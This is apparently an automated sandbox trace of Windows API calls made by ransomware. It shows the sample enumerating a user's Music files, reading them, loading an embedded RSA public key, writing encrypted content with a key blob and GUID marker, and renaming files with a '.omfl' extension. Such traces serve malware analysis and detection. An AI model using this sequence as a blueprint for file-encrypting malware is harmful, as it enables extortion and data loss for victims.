[0131.199] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24578 [0131.199] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e78 | out: hHeap=0x4970000) returned 1 [0131.199] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d2e68 | out: hHeap=0x4970000) returned 1 [0131.199] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24890 | out: hHeap=0x4970000) returned 1 [0131.199] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24578 | out: hHeap=0x4970000) returned 1 [0131.199] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cf128 | out: hHeap=0x4970000) returned 1 [0131.199] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x75038a0 | out: hHeap=0x4970000) returned 1 [0131.199] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce0a50 | out: hHeap=0x4970000) returned 1 [0131.199] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfc0b8 | out: hHeap=0x4970000) returned 1 [0131.199] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e3210 | out: hHeap=0x4970000) returned 1 [0131.199] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8a0 | out: hHeap=0x4970000) returned 1 [0131.199] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16fb0 | out: hHeap=0x4970000) returned 1 [0131.200] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8b0 | out: hHeap=0x4970000) returned 1 [0131.200] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16a40 | out: hHeap=0x4970000) returned 1 [0131.200] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cf068 | out: hHeap=0x4970000) returned 1 [0131.200] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16f98 | out: hHeap=0x4970000) returned 1 [0131.200] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16f68 | out: hHeap=0x4970000) returned 1 [0131.200] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17560 | out: hHeap=0x4970000) returned 1 [0131.200] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb28 | out: hHeap=0x4970000) returned 1 [0131.200] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24788 | out: hHeap=0x4970000) returned 1 [0131.200] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16f50 | out: hHeap=0x4970000) returned 1 [0131.200] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd34a10 | out: hHeap=0x4970000) returned 1 [0131.200] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd206b0 | out: hHeap=0x4970000) returned 1 [0131.200] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24368 | out: hHeap=0x4970000) returned 1 [0131.200] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x757c9b0 | out: hHeap=0x4970000) returned 1 [0131.200] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7503670 | out: hHeap=0x4970000) returned 1 [0131.200] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cdf28 | out: hHeap=0x4970000) returned 1 [0131.200] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e58 | out: hHeap=0x4970000) returned 1 [0131.200] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cdb88 | out: hHeap=0x4970000) returned 1 [0131.200] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd08ea8 | out: hHeap=0x4970000) returned 1 [0131.200] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e4b90 | out: hHeap=0x4970000) returned 1 [0131.200] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0131.200] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0bd00 | out: hHeap=0x4970000) returned 1 [0131.200] WriteFile (in: hFile=0x5c8, lpBuffer=0xdd35410*, nNumberOfBytesToWrite=0xdfd3, lpNumberOfBytesWritten=0xe00fb14, lpOverlapped=0x0 | out: lpBuffer=0xdd35410*, lpNumberOfBytesWritten=0xe00fb14*=0xdfd3, lpOverlapped=0x0) returned 1 [0131.201] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd35410 | out: hHeap=0x4970000) returned 1 [0131.201] SetFilePointerEx (in: hFile=0x5c8, liDistanceToMove=0xdfd8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0131.201] WriteFile (in: hFile=0x5c8, lpBuffer=0xdd24260*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0xdd24260*, lpNumberOfBytesWritten=0xe00fb50*=0x100, lpOverlapped=0x0) returned 1 [0131.208] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24260 | out: hHeap=0x4970000) returned 1 [0131.208] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5cf0 [0131.208] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x428) returned 0x757b558 [0131.208] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH", cchWideChar=-1, lpMultiByteStr=0x757b558, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH", lpUsedDefaultChar=0x0) returned 41 [0131.208] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x430) returned 0xdd19550 [0131.208] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x757b558 | out: hHeap=0x4970000) returned 1 [0131.209] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5cf0 | out: hHeap=0x4970000) returned 1 [0131.209] WriteFile (in: hFile=0x5c8, lpBuffer=0xdd19550*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0xdd19550*, lpNumberOfBytesWritten=0xe00fb50*=0x28, lpOverlapped=0x0) returned 1 [0131.209] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd19550 | out: hHeap=0x4970000) returned 1 [0131.209] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0131.209] WriteFile (in: hFile=0x5c8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0xe00fb50*=0x26, lpOverlapped=0x0) returned 1 [0131.209] CloseHandle (hObject=0x5c8) returned 1 [0131.212] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5cf0 [0131.212] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x870) returned 0xdd29950 [0131.212] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5cf0 | out: hHeap=0x4970000) returned 1 [0131.212] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\EHrGl.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\ehrgl.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\EHrGl.m4a.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\ehrgl.m4a.omfl")) returned 1 [0131.213] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd29950 | out: hHeap=0x4970000) returned 1 [0131.213] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb98 | out: hHeap=0x4970000) returned 1 [0131.213] VirtualFree (lpAddress=0x6ec0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.215] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf9d98 | out: hHeap=0x4970000) returned 1 [0131.215] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdb66c290, ftCreationTime.dwHighDateTime=0x1d5dbc6, ftLastAccessTime.dwLowDateTime=0x904b90c0, ftLastAccessTime.dwHighDateTime=0x1d5e0ed, ftLastWriteTime.dwLowDateTime=0x904b90c0, ftLastWriteTime.dwHighDateTime=0x1d5e0ed, nFileSizeHigh=0x0, nFileSizeLow=0x16fd3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="FbcE9Yewc0.m4a", cAlternateFileName="FBCE9Y~1.M4A")) returned 1 [0131.215] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757c9b0 [0131.215] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x76) returned 0xdcf9d98 [0131.215] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x757c9b0 | out: hHeap=0x4970000) returned 1 [0131.215] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\FbcE9Yewc0.m4a") returned=".m4a" [0131.215] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\FbcE9Yewc0.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\fbce9yewc0.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c8 [0131.215] GetFileSizeEx (in: hFile=0x5c8, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=94163) returned 1 [0131.216] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0131.219] SetFilePointerEx (in: hFile=0x5c8, liDistanceToMove=0x16fad, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0131.219] ReadFile (in: hFile=0x5c8, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0xe00fb78, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb78*=0x26, lpOverlapped=0x0) returned 1 [0131.220] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb98 [0131.220] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb98 | out: hHeap=0x4970000) returned 1 [0131.220] SetFilePointer (in: hFile=0x5c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.220] ReadFile (in: hFile=0x5c8, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0xe00fb70, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb70*=0x16fd3, lpOverlapped=0x0) returned 1 [0131.221] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0131.221] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1ef) returned 0xdd0bd00 [0131.221] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0131.221] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0131.221] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d2e68) returned 1 [0131.222] CryptCreateHash (in: hProv=0x49d2e68, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0131.222] CryptHashData (hHash=0xdce3a70, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0131.222] CryptGetHashParam (in: hHash=0xdce3a70, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0131.222] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x11) returned 0x74cdf28 [0131.222] CryptGetHashParam (in: hHash=0xdce3a70, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0131.223] GetLastError () returned 0x0 [0131.223] CryptDestroyHash (hHash=0xdce3a70) returned 1 [0131.223] CryptReleaseContext (hProv=0x49d2e68, dwFlags=0x0) returned 1 [0131.223] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0bd00 | out: hHeap=0x4970000) returned 1 [0131.223] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0131.223] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0131.223] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb60 [0131.223] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0131.223] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb98 | out: hHeap=0x4970000) returned 1 [0131.223] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb98 [0131.223] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x16fd0) returned 0xdd35410 [0131.224] SetFilePointer (in: hFile=0x5c8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0131.224] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0131.224] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1f0) returned 0xdd0bd00 [0131.224] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb60 [0131.224] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1f0) returned 0x74e4b90 [0131.224] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x58) returned 0xdd08ea8 [0131.224] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdd34a10 [0131.224] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16f50 [0131.224] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdd34a58 [0131.224] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16f68 [0131.224] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16f98 [0131.224] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16a40 [0131.224] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16fb0 [0131.224] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x24) returned 0xdd0d930 [0131.224] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x158) returned 0xdd27968 [0131.224] RtlReAllocateHeap (Heap=0x4970000, Flags=0x0, Ptr=0xdd27968, Size=0x218) returned 0xdd206b0 [0131.224] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x558) returned 0xdce69c8 [0131.224] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16f98 | out: hHeap=0x4970000) returned 1 [0131.224] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16fb0 | out: hHeap=0x4970000) returned 1 [0131.224] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16a40 | out: hHeap=0x4970000) returned 1 [0131.225] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0d930 | out: hHeap=0x4970000) returned 1 [0131.225] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce69c8 | out: hHeap=0x4970000) returned 1 [0131.225] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16a40 [0131.225] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e58 [0131.225] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd16fb0 [0131.225] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x18) returned 0x74cdb88 [0131.225] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x9) returned 0xdd16f98 [0131.225] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e78 [0131.225] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10e) returned 0x74e3210 [0131.225] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9278 [0131.225] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x58) returned 0xdd08cc8 [0131.225] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x14) returned 0x74cdf28 [0131.225] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x104) returned 0x7503670 [0131.225] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x14) returned 0x74cf068 [0131.225] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e38 [0131.225] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e3210 | out: hHeap=0x4970000) returned 1 [0131.225] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16fb0 | out: hHeap=0x4970000) returned 1 [0131.225] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e78 | out: hHeap=0x4970000) returned 1 [0131.225] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16f98 | out: hHeap=0x4970000) returned 1 [0131.225] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cdb88 | out: hHeap=0x4970000) returned 1 [0131.225] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e58 | out: hHeap=0x4970000) returned 1 [0131.225] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16a40 | out: hHeap=0x4970000) returned 1 [0131.225] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9278 | out: hHeap=0x4970000) returned 1 [0131.225] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd08ea8 | out: hHeap=0x4970000) returned 1 [0131.225] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd206b0 | out: hHeap=0x4970000) returned 1 [0131.225] GetCurrentThreadId () returned 0x618 [0131.225] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24260 [0131.225] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x82) returned 0xdd2cf10 [0131.226] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x2c) returned 0x750cb28 [0131.226] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d2e68 [0131.226] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x148) returned 0xdd17560 [0131.226] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e58 [0131.226] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e78 [0131.226] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24368 [0131.226] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0131.226] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0131.226] GetCurrentThreadId () returned 0x618 [0131.226] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0131.226] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0131.226] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xeb) returned 0x74e3210 [0131.226] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0131.226] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0131.226] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0131.226] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0131.226] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e3210 | out: hHeap=0x4970000) returned 1 [0131.226] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24788 [0131.226] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e58 | out: hHeap=0x4970000) returned 1 [0131.226] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4c) returned 0x757c9b0 [0131.226] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e58 [0131.226] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24578 [0131.226] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e98 [0131.226] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16a40 [0131.226] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e98 | out: hHeap=0x4970000) returned 1 [0131.226] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e98 [0131.226] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8b0 [0131.227] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8a0 [0131.227] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8c0 [0131.227] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8e0 [0131.227] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa890 [0131.227] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa860 [0131.227] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16f98 [0131.227] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8b0 | out: hHeap=0x4970000) returned 1 [0131.227] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0xdcfa8b0 [0131.227] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e98 | out: hHeap=0x4970000) returned 1 [0131.227] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e98 [0131.227] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8d0 [0131.227] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8f0 [0131.227] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa900 [0131.227] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd16fb0 [0131.227] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8f0 | out: hHeap=0x4970000) returned 1 [0131.227] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x18) returned 0x74cdb88 [0131.227] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8d0 | out: hHeap=0x4970000) returned 1 [0131.227] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16f80 [0131.227] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa900 | out: hHeap=0x4970000) returned 1 [0131.227] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd16848 [0131.227] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e98 | out: hHeap=0x4970000) returned 1 [0131.227] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e98 [0131.227] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa890 | out: hHeap=0x4970000) returned 1 [0131.227] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16968 [0131.227] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e98 | out: hHeap=0x4970000) returned 1 [0131.227] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd167e8 [0131.228] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8a0 | out: hHeap=0x4970000) returned 1 [0131.228] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd16fc8 [0131.228] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16968 | out: hHeap=0x4970000) returned 1 [0131.228] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd16968 [0131.228] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd167e8 | out: hHeap=0x4970000) returned 1 [0131.228] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0xdcfa8a0 [0131.228] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e58 | out: hHeap=0x4970000) returned 1 [0131.228] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x14) returned 0x74cf128 